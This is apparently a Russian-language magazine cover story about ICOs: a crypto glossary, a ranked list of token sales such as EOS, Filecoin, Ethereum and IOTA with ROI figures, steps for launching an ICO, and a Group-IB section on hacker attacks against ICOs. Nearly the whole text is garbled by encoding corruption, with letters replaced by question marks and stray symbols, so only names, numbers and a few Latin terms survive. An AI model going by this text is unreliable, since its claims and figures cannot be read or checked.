???�??.�??�????�????�????????�??�?�??�?營CO,�??�??�????�?�????�???
???�?�(???�??�?????�?�??�???��???�???�??�??),�??�?????�??�???�????�
????� ?� ????�??� ???�?,� ???�??�?� ???�???�?� ???� ???�???�?� ???�???� ????�??
(???� ???�???� ?� ????� ????�??�??),� ???�?????�?� ?????� ???�????� ???� ??� ???,
???� ???�?????�?????� ?� �????� ??????�� ???????,� ????�?� ??� ????�???,
??????�??牜??�???�?�,�??�?�?????�?�???�???�??�???�?.
???� ??� ?????,� ???�????� ???�???� Forbes,� ?� ????�??� ????� ?� ???�??� ICO
????� ???�???� ?????� 2,3� ???�???�?� ???�????.� ???�??�?� ?� ???�????�?� ????�
?????� ???�??� ????,� ?� ?????�?� ???�????� �??????� ???�????�??粻 ????�????�
????� ?� ???�??????,� ???????� ????�?� ????� ???� ??????�?,� ???�??�?� ??� ????�
????�?� ????�???�????�??.� ????????� ???????�??� ???�?,� ????�??� ?� ICO� ????�
????�??�??�??�?�????�??�??�??�?????�??�??�????���????�??�????�
???� ???�???� ???�??� ?????� ????� ????�??????� ?????�???� ???�?????
?牜??????�??�,牜????�??�?????粻?�??�??�???�????�??�?????.
???� ????� ????�??� ???�?� ?????�??????�???� ????�??� ??� ???�??� ???�???
????� ?� ???�????�??.� ?� ??????,� ICO� ?� ??????�???�??� ???�??????,� ???????
????�?� ?????�????� ???????�?� ?????�???�???�?� ?� ????� ?????� ?� ???�???�?
?????�???????� ??,� ??� ???� ????� ?????,� ???�????� ?� ???� ????�???????�???
???�??�??????�?�??�???�????��??�????��??�?????�???�?????�????.
???�?????�??� ???????� ??????� ?� ???�???�????�?� ??????� ?????� ?????� ?????,
???�?�?�???�?????
??????? ??????? ????????
�
? Pre-ICO,� ???�???� ?� ????�???????�??� ???�???� ??????� ???� ????�??�??
??牜??????�???�?�.
? ICO�(Initial燙oin燨ffering),�??�?????,�????�???��???????�????�
???????� ???????,� ??� ????�???� ??????�?� ???????� ?????� ???�???�?
??�?????�??�?????�???�?????�?.
? ??�?,�???�??�???�?��??�??�???�????�?????.
? ??�??� ?� ????�?????� ??????� ???�????,� ??� ???????� ?� ???�??� ???�???�??
???�??� ????????� ?????� ????????� ???�???�?????� ??????,� ????�?,� ??????,
???�?�??�??�???�??.
? ????� ?� ??????�??????� ???????�?� ????� ????�??�??�?� ???�???� ???� ????�
?????�?????�??�???�?�??�???.
? ???�????� ?� ????�????� ????,� ???????� ??� ??????�?� ??????� ???????�?
???�???�?.
? ???�????� ?� ????�????� ???????�?� ????,� ???????�??????� ??� ???�??
???�???�??��?????�?????�?.
? ??�???� (bounty)� ?� ???�???� ???????� ??� ???�????�??� ??????� ??� ?????�
???????� ICO� (???????� ???????�??� ??� ???�??� ???�?,� ??????,� ????
??�??????��??�??).
? ??�????� (airdrop)� ?� ???�???�??� ???�???� ?????� ???????� ??????�???
???�???�?� ???�???� ???� ???????????�???�??� (�??�?粻 ?� ???�????,� ??????�
?????��????�???????�?��????�??).
? �????�?????粻(white爌aper)��???�??�???????��???�??�???�???�
?????��?�????�??�??�??�?.
? �????�??�??�?粻(roadmap)��??�?????�???�??�???�??�????�???�
?????.
? dApps��????�??�???�??�??�??�???�??.
? PoS� (Proof� of� Stake)� ?� ??????�???�???� ????� ???�????.� ???� ??????�??
???�?????�????� ???�?� ?????� ?????�??� ???????�??� ?????� ??� �?????�?�
?�??�???�?????�??�??????�????�??.
? PoW�(Proof爋f燱ork)��?????�???�???�?????.�??�???�????�??�???
?�?????�???�??�?????�????�?�????�????�????�?????�??�?????.
? ?????????�????� (smart� contract)� ?� ????�???,� ????�????�??�??
???�??�??????��??�????�??�??�?????�??�??�???�??��???�??�?.
? MVP� (minimum� viable� product)� ?� ????????�?� ???�????�??�??� ????�
????,� ????�?????� ????�?� ???�??�??,� ????�?????�?� ???� ???�??�?
??????�?,� ???�?????�??� ???�?????????� ?� ??????�??� ????????� ???�?
??�??�?????�??.
? ??�???�(escrow)��????�?,�???�?????�??�????��??�?????�?營CO
?????�???.
??????????? ??????
?
? �?????�?????
COVERSTORY
????? ????
???????????
???????????�營CO��????????????
?�????�?????????????
???????�??????
???�?� ????� ????� ???�?� ???�???�?????�?� ?� ????� ????�??????,� ??� ???�???
???�???�?�???�??.�??�??��????�?�??�????,�??????�??�???�????�???�
???�?????營CO��?????�?�??�?????�??�?.�?�??�?�??�??�???�?�???�
??????�??????�??�(?�?�???,�??�??�????),�?�??�??�??�???�??�?????�?,
?�????��??�??�?.
??�???� ???�????,� ???� ???????�??� ?� ICO� ???�???�?� ???�???� ?� ???�??�??
???� �??�?�.� ???�??� ???�???� ??????�???� ???�???� ?� ???�????� ???� (?
??� ????�??� ????� ???????� ?� ????),� ??� ???�?� ???� ?????� ????�?� ????????� ?????
????????�??�?� ???�??.� ???�???� ?� ????�???� ?� ????�??� ???�????� ????�?????�
????�?.�??�???�?�??�?�??�??�?�??�?�???�?�???,�??�???�??��????�
?????�??營CO.
?� ????�??� ???�????� ???�??� ICOStats.com.� ???� ???�???????� ???????�??
?� ???�??�??� ?� ????� ???�???�??� ICO� ??� 1� ???�?� 2018� ????.� ???????� ?� ????�
??????�??.
1.燛OS�(ROI�+117%��.06.2017).�??�??�??�????燘lock燨ne�???�??????�
??��???�?�??�???.�???�???�???�????�???�????�??�??�??�???�?????�
???�???�??�??� ???�???�??� ??� ????�??�?� ?� ???�??� ??� ???�??�???�????.
???�?????燛thereum.�??�???�??????�???�?????��???�17�???,�?????�
?????� ???�?� ?????� ???.� ??� ???� ???�?� ????�??� 350� ????�???� ???�??????.
?� ???�?� ???�???� ????�??� ?????� ???????�??� ?????� EOS� ???�??�???�???
???�?�??????�???�???�?�?�??�??�??�??�?燛TH,�??????�??�?�????
?????.
2.燬tatus�(SNT)�(ROI�+24%��.06.2017).�????�??�???�??�??�??�??�???
?�???�??�??�???.�??�????,��??????�??�????�??�?????�???�燭ON�???�
??� ??????.� ???�????�???� ??????�?� ????� ???�??� �?????�??� ???�???�????
???�????� ??� Ethereum�,� ?� ???� ???�?� ???�??�???�?� ???�??�??� Ethereum?????�
????�??.�??�?????�??�??�??�????�?爄OS��??燗ndroid.��?????�???燬ta?
tus� ???????�????� 5� ???�?????� ???�????� ?� ???�??�???� Riot.im� (?????�???�
????�??�??� ???�??�???,� ???????� ??� ???�???� ???�??�?� ?� email� ???� ??????
??????�?).� ??� ???�?� ???�????�?� 20?21� ????� ???�??� ???�??� 108� ???�?????
???�????.
3.� Bancor� (BNT)� (ROI� ?64%� ?� 12.06.2017).� ???�?????� Bancor� ????� ???�??
???�?� Filecoin� ??� ???�??�?:� ???�?� ?� 150� ???�?????� ???�????� ????� ???�???
?� ETH� ??� ???� ????� ?� ??????�?� ????� 2017� ????.� ????�?????�?� Bancor� ?????
???�?????�???� ????�???�??� ??????� ????�????� ERC20� ?� ????�?????�?� ???
???�????�??.�??�??�?????�?????�??�???�?�?�???�??????�??�??�?.
???�?� ?????� ???�???�?� ???�????� ???�??� ????�?????�????.� ????�?� ???�??
??�??�??�?�???�??�?�?�??�???�???�??????�??�??�??��???�?��????�
???�????�??�???�????�???�???�????????�??�??.�???�?,�??�??????燘an?
cor�燬tatus�???�??�???,�??????�??�???�??�????�???�燛thereum:�????�
????�??�?�?�???�??�?��???�??�??�???�???�?????�燛TH,�????�??????
???�?????��??????�??.
4.� Tezos�(XTZ)� ?� ?????� ?????�??�???�??�??� ????�???,� ???????� ????????�
????�??�??�???�??.�??�?????�??�???,�??�?�??�??�??????燛thereum.
Tezos�??�??�???�?�????�???????營CO????�????�???�???�???,�???�?
???�?????�????�??�???�?�??�????�????��??�????�??�??�??�?�??�?
???�????� ?????� ???�??� ??� 75%.� ??� ???�?????� ?????�??,� ????�???�?� Tezos
(?????�??� ????� ?????� ?� ???�??� ????�???)� ??????� ?????�???� ????.� ???� ???�?
???�?????� ???�?� ???�????� ?� ?????� ?� ????�?????�??� ??????�??�?� ???�??
?燭ezos燜oundation.
5.� Filecoin� (FIL)� ?� ???�??� ?????�?� Protocol� Labs,� ???????� ???�??� ???�????�
???�?????�???�????��??�????�?�???????????�???�??.�??�?????燜ilecoin
???�????� ?� ??????�???� ?� 10� ???????� ??� 7� ???�????,� ???�??� 135� ???�?????
???�????�???�??�???�??�?�??�??�??.��??�????�??�??�?��???爌re?
ICO�??????�?�?�???�?燗ngelList.�???�??�??????�??�???�??�??�???????�
??� ???�????� ???�??� ?� ?????�??�???�??�??� ???�??� ???� ???�????� ???�??,
????�??�??� ??� ????�??�?.� ???�???�?� ???�???� ???�??� ?� ???????� Filecoin
???�??�?????�?????,�??�??��???�?�??�??�??�????�???�????�??.
6.� Ethereum� (ETH)� (ROI� +17� 464%� ?� 22.07.2014).� ?????,� ???� ???� �???�
??????�?� ??????�?� ???�?� ???�??�?????� ??� ????.� ???� ????�????� ?� 2014� ????
???�???�??�???�????�?�??�??營CO:�????�?�??�?�??�???��??�?????
???�??� �??�?粻 ??� ???�?� 18� ???�?????� ???�????.� ????�????� ??????
????????��?????�?�15�???.��???�???�?????�?�16�??牜?????粻????�
?????� Ethereum� ???????� ?� ?????� ????� ???�??,� ?� ???� ???�?� ??�????,� ??�?????
?�?????�??,� ???�??� ???�????�?� ?????????�???�?� ?� ??�????� ???�?� ???�???�
?????�??�??�????燭he燚AO.
7.� Brave� (BAT)� (ROI� +136%� ?� 31.05.2017).� ????�????� Mozilla� ?� ???�?????
???�?� Java� Script� ????�??� ???� ??�??�??� ???�???� Brave� ???� ?� 2016� ????� (??.
???� ?????).� Brave� ????�???�?� ????�???� ????????� ??� ????�???�??� ???�???,
??�??�???�???�???�??�??�????�????�???燗dBlock.�???�?????�???,�??
????�?????�?� ????� ?????� ??????,� ?????� ?????�?� ???�?????�???� ??� ???�??
??????.� ?� ???�?????� ???�??� ?� ???????�??� ???�???� ??????�?� ??????�????
???�?�??�????�??�??�????�??��???�??�?????�????.��??�17�???
?????�?�??�????�????燘rave�??�???�????�??�???�??�?????��???�??.
??� ???�?????� ???�???� ???�???� ???�??????� ?????�????� ????� ?� ????�
????� 35� ???�?????� ???�????.� ???�?� 130� ???????� ???�?� ????�???�???
???????,�??�???�?�?�?????�???�???�?????�??,�???????�??�???�?.
8.燬torj�(ROI�+215%燾�.07.2014).�????�??�???�??�??�????�????�??�???�
?????� ???�???�?� ?� ?????�??� ????????� ?????.� ???�?????� Filecoin.� ??????
????�???�???�??�??�????�??�???????�??????��??????�??燜TP???????�
?????� FileZilla.� ??� ???�?� ???�???�??� ICO� ???�????�????� ???�???� ????�
????� 30� ???�?????� ???�????� ??� ?????� ????.� ???� ???�????� ???�???????�?
???????�???�?�????�????�?,�??燝oogle燰entures,燪ualcomm燰entures�燭ech?
stars.�??�?????�燬torj�????��?????牜??�??�??�?????�???.�??�????�???
????��???�?��???????�???�?????�?�.
9.� Aragon� (ANT)� (ROI� ?35%� c� 17.05.2017).� ????�????� ???� ???�????� ?� ????�
????� ????�?� ?????�??�???�??�??� ????�???�??.� ?????� ???�????,� ???????
??� ??????�???� ???�???� �??�??� ???�?????�???� ???�?�,� ?????� ???????�?
???????�???�??????�????��??�??�??�???,�??�??�??�????�??????�??
??????�???�?� ????�???.� 17� ???� 2017� ????� ???�?� ??� 15� ?????� ??� ????�?� ????�
?????�?�??�??�??�??��??�?????�??�????�燛TH.
10.� IOTA� (ROI� +13� 787%� c� 25.11.2015).� ???�??�??� ?????�??� ???� ???????�?
?????.�?????�?�?�?�???�??�?,��?�???�???�??�??�???�??�??�??????
Tangle.�?�????�?�???�?????�??�??????�???�??�????��??�???�???�???
???�????�?� ???�??�???�??�??,� ????� ???� ?????�??� ?� ???�????� ???�??????�
??????.��??????�??????�???�??�?�??�??�??�??�???�?��???�???��???�
??????� ???�??�??�???� ?� ?????�?.� IOTA� Foundation� ?� ???�????�??� ???�???
Microsoft.� ?� ???�????� IOTA� ????� ?????�???� ???�????� ??� ???�????�?� ???�?
????�????�????�??�??�??????.�????��??�???�???�??�???�??�?�?????�
????,� ??� ???� ?� ????�?� ?� ??????�???� ??????�??� ?????�?� ?� DDoS????�?
?�?????�??�???�?????�??�??�???�?????�??�????�??�????.
??????????? ??????
?
? �?????�?????
COVERSTORY
????? ????
???????????
???????????�營CO��????????????
?�????�?????????????
???�??�??�???�?????�??�???
? Cardano�(ANA)��????????�???????�???�????�?�??�?�???�????�????�
???� Haskell� c� ???�??�?????�??� ???�????�??� ??????�???�???.� ????�
???????�?�?????�??�???,�???�?�??�??????燛thereum.
? Einsteinium� (EMC2)� ?� ????�?????�?,� ????�????�??�??� ???� ?????�??????�
???�???�??��??�?????�??�??�??�????.
? Emercoin� (EMC)� ?� ???�??�????�??� ???�???� ???????�??� ???????�??.
???�???��13�???�??�??�???�????�??.�??????�??�???�???��??�??
?�???.
? Verge�(XVG)��???�?????�?��??�??�??????�?�??�??�????.�??????�
????� Tor� ?� I2P.� ????�?????� ???�????� ??� ????� ??????� ???�???�?� ????�??�?
�???�??�??�??�?�??�????粻(SVP).
? Decred�(DCR)��?????�??�???�?????�???�?????�?,�??????�??�????
???????�?� ????�??�??� ???� ??????� ???�???,� ???????�????�??� ?� ?????�
????.
? Komodo�(KMD)��??�??�???�?�???�????燬uperNET,�??�?????�?�???�
???� ??????� ??� atomic?swap� ???????�?,� ???�???????�????�???,� ??????�
???�???�??�??�???�??�????.
? Steemit� (STM)� ?� �???�????????�.� ????�????� ???� ??????�????� ??????�
????�??�???��????�????�????�???�???�?�???�???��????�?????.
??�??�???�???�???
????�?�????�??�???�?�???�????�???�??�???�營CO��???�??�??�?�???�
?????�??�???�???�??????�??�??�?.�???�?????�???�?�?�??�??�?????
??????�?�??�??�?????�?,�?�?�?????�??�??�?????�????�???�?????�??
???�???�???????�???�?�?�???�?.�??�??�??�?,�?�??�?�???�???�?�??
????�?�??�???�?????�??�????�牜???�?????�???????�.
? QTUM� (ROI� +1009%� c� 12.03.2017).� QTUM� Blockchain� Foundation� ????????�
???�????� ?� ???�?????� ?� ????�?� 2016� ????.� ?????� ????� ???�??� ???� ?
?????�???�????�???�??�???��????�???�??�????�???.��????�?�????�
????� ?????� ???�?????� ????�??� ???�????�????,� ?????�???� ??� ???�??� ????�
?????.� ??� ???�?� ???�????�?� ????� ???�???� 5000� BTC� ?� ???????� ??????
?????,� ???� ????� ????�???�??� ???????�??� ????�??�??� ???�???� ???�?????
?????�??�????�??�????.燪TUM�??�??�????�??�?????�??�??�??�?
????�??�??� Bitcoin� ?� Ethereum� ???� ???�??�????�??� ???�??????�???�??
???�???�????��??�???.
? Hshare�(HSR).�???燞share��??�??�???�???�??�?�??????�???�??????
???� ????????�???� ???�??�??�????.� ???????,� ???� ?????� ????�???�??
???�??�????� ????� ?????�??�???�??.� ???�????� ?� ???�???� ???�?� ????�???�
???� ?????�?� ???�???� ??� ???�????�??� ???�?,� ?� ???� ?????� ????????�?.
????�??� ???�??�??� ???�???�?� ???�??�???� ???�??�????.� ????�?????�?
???�???�?????�???燙ollin燬tar燙apital��??�??�??�???�??�????,�??????
???�????�???�???�?�???�??�?��??????�??�????�???.�??�???????
?????�????�??�???�?????燞share�????�?????�?�?燞cash.
? Elastos� (ELA)� ?� ?????�??�???�??�??� ???� ???� ???�????� ?� ???????�??
dApps.� ???�?????� EOS.� ?????�?� ???�????�????� ??????�???� ?� ??????
?�??�??.燛lastos�??�??��???�?燝3,��??�???�??????�??�?燦EO�燘it?
main.� G3� ?????�?� ???�????�???� ?� ???�?????�????� ?????.� ?� ???�?� ???�???�
???� ????�???:� Foxconn,� Alibaba,� Huawei,� AVIC� (????????�???�??� ???�????�
?????�??)��??�??.�??�?????燛LA�????�???????�?????�?�???�????,
???�?????��??�??�???燛lastos.
? NEO�(ROI�+22�4%燾�.10.2015).�??�????�?�?�???�???�????�??�????�
???�??� ????�?????�??.� ???�?????� Antshares� (???�?� ????�??�????�??
?� NEO� ???� ???�???�??� ICO)� ?� ???�????� OnChain,� ???�?� ???�??� ???�??
?�???�??�???�?????��????�??�??�????�???�????�???�?.�??�?????�
????� ???�??�???�?� ?????� 60%� ????� ????�?????????� NEO.� �????�???
Ethereum粻 ???????� ???�????�???� ?� ???�?????�????� ???.� ????� ???�?????�
????�??�??�??�??�??�???�????�???�??�??�?????�??�????????�????�
???��????�??�??????�?�??????�??�??�???�??�??�?????�???.
??????�?????
??� ???,� ??????�???� ????� ???�???� ????�???,� ??????,� ???�?� ?� ???????�?????
???� ?� ????�??� ????�???�???� ????� ???�?� (???�?,� ???�????,� ???�?)� ??� ?????,
??�???�?,�??�?????�???????,�??�?�???????�?�???�?????�?��??�????.
?????�??�?????,�??�???�???�???????營CO:
? ???�???�??�???�?????��???�??�????�??
? ???�???�??�??�??�???�???�???,�???�?�???�??�??�爓hite爌aper?
? ??�???�???�??�????�??�????
? ??�??�??�???????�???
? ????�???� ???�???�???�?� ?????� ???�???� ???�???,� ?� ?� ???�??� ???� ?????
?�????�??�??�???�????
? ??�???�?????�????�??�??�??
? ????�??�????� ???�???� ???�?????�????� ???� ????� ????�??�??� ???�???
??�???�??�????
? ??�?�?????�?�??�??營CO�?�???�?�??�????
? ????�??�???�???�?.
????�?�??�?�??�??�??�????�???�??�?�??�?��????�??�???.�????�??
???�????�?� ????�???� ???�?,� ???� ???????� ??????�???� ???�????� ???�????,
?� ?� ???�???� ????� ???� ?????�?????�??�???� ???�?� ???�????.� ???�??� ????�???
???�??� ???�?????�?,� ????�??� ???�???� ?????� ???�??� ???�??�?.� ??????� ??� ??
????� ?????� ?� ???????� ???�??�?� ???�????� ?????�??� ???�????�??,� ?� ???�??,
???�??????�??��??�??�???�???�??�??�????�???�????�????�??�????�?
???�???,��???�?�?????�?????�????�??�?�?�???.
??�?�???�??????�??�???�???�????�?,�???�????�?��??�???,�???�??
???�??� ???????�??�??.� ???�???� ??� ?????�??� ??????,� ?� ???????� ??????
???????�?????,� ?� ?????�?????�??� ???�?.� ???�????,� �??�?????� ??????�
?� �???�??�???� ??????粻 ???� ??� ??????�????�?� ????�??�?� ???�????�??
???�?????�?�????????????��?????��??�??�??????�???�???,�??�???�
?????�???� ?????� ???� ????�?.� ???�?� ??� ???�???� ???�???� ???????�????�?
???�??�?.
???�???????? ICO
??�?�?�????�????�??�??�??�?營CO,�??�?�??�???�????�?�???�??�??,
??� ???�?:� ???�???�???� ???� ???????� ???�???� ??� ???�????�?� ?� ???�??�??
???????�??� ?????� (???�?� ?????� ???�??� ?� ???� ???????).� ??� ?� ?????�?,� ????
????� ???�????�??� ???�?� ?� ???�??� ????�??� ?????�????�???,� ???�????� ?????�
???????.�??�????�???�???�??�?.
1.� ???�??�?�???.�??�??�????�??�?�?????,�?�??�????�?�?�??�??
????.� ???�??�?� ?� ???�?� ????� ?????�?� ?� ???�????�?� ????????� ????�????�
??????� ???�???� ??� ???�?,� ???� ???� ????� ????�??.� ?????� ???????� ???�???
?� ???????�?,� ???????� Bitcoin� Forum.� ???�????,� ??????� ???� ???� ???�??
??�???�??�?�??�??,�?�??�??�????�???�??.
2.� ??�??�?.� ?� ???�??�?� ??� ????� ??� ????�???�?,� ???� ???� ???� ???�?????�
?????�??.� ???�?� ????�?� ???:� ???�??�??�?,� ????�???,� ?????�???,� ????�
??????�?,� ????�??�???????�???,� ????�?????�?,� ?????�?� ??.� ???�??
??????�??�?� ?� ?????� ???�?,� ?� ????� ??????� ?????� ???�?� ?????�???,� ??
???� ????�??� ????.� ??� ????� ??� ???�?� ???�?� ?????� ????�?????�?� ?� ????�
??????�???�??.� ???�??�?,� ????� ?� ????� ?????�?� ???�????�????�??,
???????�???????�??�??�??�?營CO.�?�??�??�??�?,�??�??�?�??�?????
???�????� ????�??�???� ???????� ?� ????????� ???�??� ??� ???�??�?� ???�?
????�?????�??.� ???� ???�?� ???�???�???� ???� ???????� MVP,� ???�??�???�
??????� ????� ?� ???� ????�????.� ???� ???�?� ???�???�???� ?� ??� ???�??� ????�
????.
3.� ??�??� ??????.� ?????� �??�??�????粻 ?� �???????粻 ??????� ???�???
?� ????�???�???� ?� ???????�????� ???????� ?????�????.� ???� ???�?????�??,
???� ????�?� ???�??� ??� ?????.� ????�?� ??????� ???�?????� ?� �????�??
???�?�.
4.� ??�??�????� ???�???.� ???�??�???� ?� ???�???� ???�????�??,� ?� ???�?
???�?????�??� ??� ??????� ???.� ???�???,� ????�?,� ???????,� ??????,� ??????,
????�??� ???????,� ???�??�?,� ?????�????�??� ???�?� ???� ???�?????� ???�?
??� ?????�?????�?????� ???�?� ???�???� ????�?????�?:� ?????� ???�???� ?????
?????�???�???�??????�??�??�????�????�????�??�??????�???�???�
?????� ?????,� ????�?� ??� ???�???�????� ?????????,� ?????� ????�?????�?,
???�??� ?� ?????????.� ????�????� ?????� ???�?.� ???� ???????� ??� ???�?� ????�
????�??��?�???�????�???�??�???.
5.� ??�??�??�??� ???�????.� ???�???�?� ???????� ?????�?� ?� ???,� ???� ?� ????�
???�???�??�??�???�?�?????�?????營CO.�??�??�????�???�?????�????�
??� ?????,� ???�?� ??� ????????� ??� ???�?.� ???�????� ?� ???�??� ???�????�??
?????�??營CO�?????�???????��??�???�??�??�??營T?????�?�??�???�?
??????:� 獻CO.� ???�????,� ????�???,� ?????粻 ?� 獻CO.� ?????� ?????,� ??� ???
???粻(PDF).
6.� ????,� ???�????� ?� ???�???.� ?????�?� ??,� ????� ??????�??�?� ????
?� ?????�??� ???�??� ?� ???????�???� ?� ?????�?,� ???�????�??� ???�????
(???�?�?�?????�?!)��???�??�?????�???��??�????.
7.� ???�??� ?????� ???????�????.� ???� ???�??� ???�??� ???�????,� ????
?� ?????� ???�??� ??????� ?� ????� ???�??� ???�??� ?� ???�?� ???� ???�??� ????�
???????� ?� ?????????�???�?.� ???�?????� ?� ???,� ???� ???� ???�???�??� ?� ???
??�??�?�???????�?,�????��?????牜???�??�??�???�?�??營CO�.�??�???�
?????�?�???�???�?營CO�??�?????�?�??�?�???????��??�?????,�?????
??燚DoS��??�??�????.
8.� ??�?�???�??�??.營CO????�???,燭elegram???????,�??�???�????�??,
YouTube,� ???�?????�??�??� ???�???.� Bounty?� ?� airdrop????�????� (????
?????�?�??�?????).�??�??,�??,�??�??�????�???�???��?�??�??�??
?????.�?�???�?�??�?�??�?????�?�????�?�??�??�????��???????�
?????�?�??�?�??????�???.
9.� ??�???� ???????.� ?????�???� ????�???�??� ??????� ???�?� ???�?
?� ????????�?� Waves� ???� ???�????�??� ????�???,� ???� ???�??� ????�????
??�???�??�?�??�????�?�??�?????�??�???�???�??�????燴rCoin.�???�
???�???�??�� ??�??�???�?�燬olidity,�?????��??�??,�??�?�???????� ???�
???�???�????燛RC20.
10.� ???�?牜?�.�???�??�??營CO�??�??.�???�??�???�?�?????��???�???�
????� ????????� ??????,� DDoS� ?� ???�??� ????�????,� ?� ???�?� ???�???� ????�
????�??�??????�??�??????,�?�??�?:�??�???�???�?????�???.�?????
?????�???� ????,� ???� ??� ??????� ???�?????� ???�??,� ??� ???????� ???????
????�?.� ???� ???� ????????� ??????�?� ?� ??????� ??� ????� ??????�?,� ???�???
????????�????�?????!
????????�???
???� ?,� ????�??,� ???�?� ?????�????� ?????�??� ????�?????�?,� ??� ???�?� ???�?.
???�???�?�????牜????�??�?????粻?�??�?�?�??�???��??�?�??�??,�????�
???�?�?�??�?�???�??????????�????�?��???�??�??�????�??�????�?�?
�???粻?????????�???�???
???�?????�??�??�??�?�???�?�??�?�?????��????,�??�??�??�???�???
????�?� ????�??�?� ??� ??,� ???� ????�???� ???????� ???�????�?� ???�?,� ???�?
????????� ?????�????� ?� ???�???� ???�??�???�??� ???�?????�????� ????�???�
?????�?�???�??�??.
COVERSTORY
???�????? ??????
???
?????????
???????
????????
?????????
???????
?�????營CO
ICO
?????????�????????
???????????�???????????�?
??????�????????????????
Group?IB
?� 2017� ????� ?????�???�????�??� ???�???� ???????� 10%� ????
???????,� ???????�????�??� ?� ICO� ?????� Ethereum.� ?????
?????� ???�????� ???�?� 225� ???�?????� ???�????,� 30� ?????
???????�??� ????????� ?� ????�??� ??� 7500� ???�????.� ????�
?????�?,�??�???�?�??�??�???�?�??營CO.�??�????�???
???????� ????� ?????�???� ????�??,� ?� ?????� ??????�?????�?
?�????�??�????�??�?????.
�??� ??� ??????� ICO� ??� ????�??�???� ?� ???????� ?????�????� ???�??,� DDoS?
???�???� ?� ????�???� ?� ??� ??????� ?� ??� ??????�?????� ??????:� ????????�
????��??�??�??�?�???�??????,�??�?�?�??�???�????!?�,��???�????�
??� ???�????�?� ?� ???�????�??�?� ICO� ????� ???????,� ?????�??� ??� ???�?????�?
Blackmoon.� ???� ?????�?� ????�?????� ??� ???????� ?� ???� ?� ?� Group?IB,� ?� ??
??????�?� ?????�????� ???�?,� ???�??�???�???� ????� ???�????�??????????�
?????.
????�?� ???� ??� ????�???� ?????� Blackmoon� ???�???� ?????� 30� ???�?????
???�????.� ??� ?????� ???�??�??� ICO� ???�???�?� ??� ????�?.� ??� ????�?????�??
???� ???�?� ????�???� ??????�???� ??� ????�?� ???�????�?� ?� ????�???�???�???,
??��?????,�??????�?????�???�???�?????�??�??????��?????�??.
????�?????�?� ????�???�?� ?????�???�????�??� ???� ?� 2011� ????:� ????�?
???�?� ??????� ??????� ???????� ????�?????� ?????�????� ??????�?,� ?????�
???????�??� ???�?� ?� ???????�?,� ????????� ???�??�??� ???�?� ??� ??????�??
???????�??� ???.� ??????�??� ???�??�???� ???�??� ?� TrickBot,� Vawtrak,� Qadars,
Triba,� Marcher� ?� ????� ??????�???�?� ??� ????�?????�??� ????�??????�??
??????�??.
??�???�??�??� ?????� ?????,� ???�?????� ????�??????�??� ???�?� ???�?
??� ????�?� ???�???�????� ?????�???�????�?,� ??� ?� ???�???�???�???�??
??????.� ?� ???�???,� ?� ?????�??� ???�??� ??� ????�????�???� ????�????�???
?????�???�?�??????�?�?????�????�???�???�?燣azarus.
?� ???�??� ???� Bitcoin� ??� ???????� ???�???�???� ?????�???�??� ???�????�?
?�???????�????�???�??�??.�??????�??�??????�????營CO�????�???�?
????�???�???�???.�????�??�???�??�?????,�??????�?????�?�?????�?
?�???�??�?��?????�??????�??,�??�?�??�???????�??�???�??.
????�營CO
???�?� ?????�?� ????�?� ???�??�?� ICO,� ???� ?� ???�??� ???�???� ???�?????�???
White� Paper� (WP)� ?� ????????,� ?� ???????� ???�???�???� ???�??????� ?� ????�
??????????� ???�???.� ??� ????�?� ???�??????�???� WP� ???�???�?� ???�???,
?� ????�???�???� ????�???�?� ????�??�??,� ????�??� ??????�?� ?� ???�???� ????�
????�?� ?????�???�???� ?????�???� ?� ???�????????� ????�???�?� ?� ?????�??.
?� ????????� ??????� ????�???�?� ????� ICO,� ???�?� ????� ???�???� ??????
????????�??� ??� ????� �??�� ???�?????� ???�????� ?� ????�??????� ?� ??� ???�??
?????�??,�??�????�??�????��??�????.��??�????�??�??�?�????�???�?
ICO,� ???????�?� ??????�?� ???�???????� ????????� ??????� ???�???,� ?� ???�??
???�???�?�???�?????�?�?�???�?????�?.
??�????�?�????��???營CO�???�???�?�??????�?�???!�?????,�??�
???�?????�??�??????�?,�???�????�?????�???�?營CO.�??�???�?�??�????�
????� ???�??� ???�??� White� Paper,� ?� ???�???�????�??� ????�???�?� ??????�??
???�?�??�?????�??�????.
?????燱HITE燩APER
??�?� ??� ???�??�?????� ???�????� ????�?????????�???� ?� ???� ???�??� ??????�
?????��???�???????.�???�??�????�??�??????��???????�????�??�????�
????��????�??�??�???.�??�??�?,�??��??�??�??�???�????�?�??�???�?
WP.
???�??� ?????�?� ???� ???????�??�????� ????�??�??� ???�??,� ???�?� ????�
????�????�?�???�?�?????�???�?�?????�????�?????�??�???.�??�?�???�
?????�????�???�?:�????�?�??????�??,�?????�??�???�??�??燱hite燩aper
??�??�???�??�?,�???�???�??�??�??�????�????燝oogle燭ranslate,�??�????�
??� ???�???� ?� ???�???�?� ???�???,� ?????� ?????�??� (???�????,� ?????�???�?)
?� ?????� ????�??.� ???�??� ???�??�?� ???�??�???�???� ?� ????:� ????�???�?� ????�
????�???�??�???,�???????�??�?�?燘itcointalk.org��??�????.
???�????,�???�??�???�?�???�?燙rypto燚etectives�???�???�?,�??�???�
????�?�??�???燱i?Fi燝lobal�??�???�???��?????�?燱P�????�?� worldwi?.io.
????� ????�??????�?� ???�?????�?,� Wi?Fi� Global� ?� ???� ???�?� ????� ???�???
??????�????�??� ????�??� World� Wi?Fi.� ???� ????� ????�??�??� ?� �????�???�
?燱i?Fi燝lobal�??�?????�?�??��??�??�?????�??????�,�?�??�??�???�???�
???�??�???,�?�??�???�???�???�0�????�??�????�?爌re?ICO.
?????????????�????????
???�???�?�?�??�?�??�???�???�?�??�???�?????�??�??????�??�??�???
???�??� ?????�?,� ???�????� ???� ???�???�????�??� ?????�???�?� ????�???�?.
??� ???� ????� ??� ???�??,� ???� ?� ????� ????�?� ????????� ???????�??� ???�??� ?????�
???� ???????.� ????� ????�??�???�????�??� ??????� ??????�???�?� ??????� ???,
??� ???� ?????� ???�??�?� ?� ????�?� ??????�???�??� ???�???�??�?� ?� ??� ????�?
???�??�???�?�???�???,�?��??�??�???��??????�??.
????�?�????�??�???�??�???�??�???�???????��???�???�??�???燛nig?
ma.�?????�???�?�?????�???�??�????�??�??�????�??�?�???,�??�???
????�?????�?� ????� ???�???�??� ICO.� ???�?????� ????�?� ????�??�???�?????
????????燛nigma��??�???�?�???�????��???�??�??�????.
??�?????�?� ???�???� ?� ?????�?� ??� ???�??????�??�?� ???�?????�??�???
?????�???.�??????�???�??�????�??,�????????�?,�?�????�????�??????�
??????� ???�??� ?� ????�??� ??????� ???� ???�?� ????�????.� ???�???�?� ???�?
